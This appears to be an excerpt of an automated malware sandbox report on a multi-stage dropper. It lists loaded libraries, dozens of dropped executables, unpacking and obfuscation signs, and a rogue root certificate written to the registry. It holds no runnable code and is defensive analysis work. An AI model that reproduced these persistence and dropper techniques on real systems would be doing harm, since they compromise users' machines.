Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntvdm64.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section loaded: icu.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: version.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: wbemcomn.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: amsi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: userenv.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: profapi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: wldp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rasman.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: fwpuclnt.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: propsys.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: edputil.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: netutils.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: slc.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: sppc.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: esdsip.dll

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\System32\conhost.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: wfJfUGeGT3.exe

Static file information: File size 1411961 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: wfJfUGeGT3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.00000000056AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.0000000005694000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4599535887.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.00000000012FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.0000000001281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: G.pdb source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

Unpacked PE file: 31.2.build2.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

Unpacked PE file: 31.2.build2.exe.400000.0.unpack

.NET source code contains potential unpacker

Source: contorax[1].exe.11.dr, -Module-.cs	.Net Code: EmptyCAHolderUnsafeToStringArray System.AppDomain.Load(byte[])
Source: contorax.exe.11.dr, -Module-.cs	.Net Code: EmptyCAHolderUnsafeToStringArray System.AppDomain.Load(byte[])

Source: contorax[1].exe.11.dr

Static PE information: 0xFA1A71C5 [Wed Dec 20 05:51:01 2102 UTC]

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Code function: 0_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406312

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: exbuild[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x6abc6
Source: 36f677264b.exe.11.dr	Static PE information: real checksum: 0x1de45c should be: 0x1e3e45
Source: meta[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x2b0038
Source: exbuild.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x6abc6
Source: contorax.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x20526
Source: crypteda[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x11b6f1
Source: crypteda.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x11b6f1
Source: random[1].exe.11.dr	Static PE information: real checksum: 0x1de45c should be: 0x1e3e45
Source: BowExpert.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x16389d
Source: BowExpert[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x16389d
Source: GOLD[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x5a6a4
Source: kitty.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x55f6e
Source: contorax[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x20526
Source: meta.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x2b0038
Source: GOLD.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x5a6a4
Source: kitty[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x55f6e

Source: 3546345.exe.11.dr	Static PE information: section name: /4
Source: 3546345.exe.11.dr	Static PE information: section name: /14
Source: 3546345.exe.11.dr	Static PE information: section name: /29
Source: 3546345.exe.11.dr	Static PE information: section name: /41
Source: 3546345.exe.11.dr	Static PE information: section name: /55
Source: 3546345.exe.11.dr	Static PE information: section name: /67
Source: 3546345.exe.11.dr	Static PE information: section name: /80
Source: 3546345.exe.11.dr	Static PE information: section name: /91
Source: 3546345.exe.11.dr	Static PE information: section name: /102
Source: meta[1].exe.11.dr	Static PE information: section name: .managed
Source: meta[1].exe.11.dr	Static PE information: section name: hydrated
Source: meta.exe.11.dr	Static PE information: section name: .managed
Source: meta.exe.11.dr	Static PE information: section name: hydrated
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: prspuaeb
Source: random[1].exe.11.dr	Static PE information: section name: plcvpmpk
Source: random[1].exe.11.dr	Static PE information: section name: .taggant
Source: 36f677264b.exe.11.dr	Static PE information: section name:
Source: 36f677264b.exe.11.dr	Static PE information: section name: .idata
Source: 36f677264b.exe.11.dr	Static PE information: section name:
Source: 36f677264b.exe.11.dr	Static PE information: section name: prspuaeb
Source: 36f677264b.exe.11.dr	Static PE information: section name: plcvpmpk
Source: 36f677264b.exe.11.dr	Static PE information: section name: .taggant
Source: channel2[1].exe.11.dr	Static PE information: section name: /4
Source: channel2[1].exe.11.dr	Static PE information: section name: /14
Source: channel2[1].exe.11.dr	Static PE information: section name: /29
Source: channel2[1].exe.11.dr	Static PE information: section name: /41
Source: channel2[1].exe.11.dr	Static PE information: section name: /55
Source: channel2[1].exe.11.dr	Static PE information: section name: /67
Source: channel2[1].exe.11.dr	Static PE information: section name: /80
Source: channel2[1].exe.11.dr	Static PE information: section name: /91
Source: channel2[1].exe.11.dr	Static PE information: section name: /102
Source: channel2.exe.11.dr	Static PE information: section name: /4
Source: channel2.exe.11.dr	Static PE information: section name: /14
Source: channel2.exe.11.dr	Static PE information: section name: /29
Source: channel2.exe.11.dr	Static PE information: section name: /41
Source: channel2.exe.11.dr	Static PE information: section name: /55
Source: channel2.exe.11.dr	Static PE information: section name: /67
Source: channel2.exe.11.dr	Static PE information: section name: /80
Source: channel2.exe.11.dr	Static PE information: section name: /91
Source: channel2.exe.11.dr	Static PE information: section name: /102
Source: Channel1[1].exe.11.dr	Static PE information: section name: /4
Source: Channel1[1].exe.11.dr	Static PE information: section name: /14
Source: Channel1[1].exe.11.dr	Static PE information: section name: /29
Source: Channel1[1].exe.11.dr	Static PE information: section name: /41
Source: Channel1[1].exe.11.dr	Static PE information: section name: /55
Source: Channel1[1].exe.11.dr	Static PE information: section name: /67
Source: Channel1[1].exe.11.dr	Static PE information: section name: /80
Source: Channel1[1].exe.11.dr	Static PE information: section name: /91
Source: Channel1[1].exe.11.dr	Static PE information: section name: /102

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D8B75 push ecx; ret	19_2_005D8B88
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005CCBF1 push eax; retf	19_2_005CCBF8
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB2808 push ds; retf	24_2_00CB280B
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB280D push ds; retf	24_2_00CB281B
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB02B4 push ecx; ret	24_2_00CB02C7
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007502B4 push ecx; ret	27_2_007502C7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0042136C push ecx; ret	31_2_0042137F
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02A147F0 pushad ; iretd	31_2_02A147FD
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02A12448 pushad ; retn 0009h	31_2_02A12455
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B115D3 push ecx; ret	31_2_02B115E6

Source: GOLD[1].exe.11.dr	Static PE information: section name: .text entropy: 7.994093571693808
Source: GOLD.exe.11.dr	Static PE information: section name: .text entropy: 7.994093571693808
Source: crypteda[1].exe.11.dr	Static PE information: section name: .text entropy: 7.99930616062516
Source: crypteda.exe.11.dr	Static PE information: section name: .text entropy: 7.99930616062516
Source: random[1].exe.11.dr	Static PE information: section name: entropy: 7.984181684209861
Source: random[1].exe.11.dr	Static PE information: section name: prspuaeb entropy: 7.952080487660967
Source: 36f677264b.exe.11.dr	Static PE information: section name: entropy: 7.984181684209861
Source: 36f677264b.exe.11.dr	Static PE information: section name: prspuaeb entropy: 7.952080487660967
Source: build2[1].exe.11.dr	Static PE information: section name: .text entropy: 7.725782681688218
Source: build2.exe.11.dr	Static PE information: section name: .text entropy: 7.725782681688218

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr			Jump to dropped file

Installs new ROOT certificates

Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000223001\36f677264b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\meta[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	File created: C:\Users\user\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	File created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000255001\channel2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	Jump to dropped file
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	File created: C:\Users\user\Windows.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	File created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3546345[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	File created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Jump to dropped file

Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

File created: C:\Users\user\Windows.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

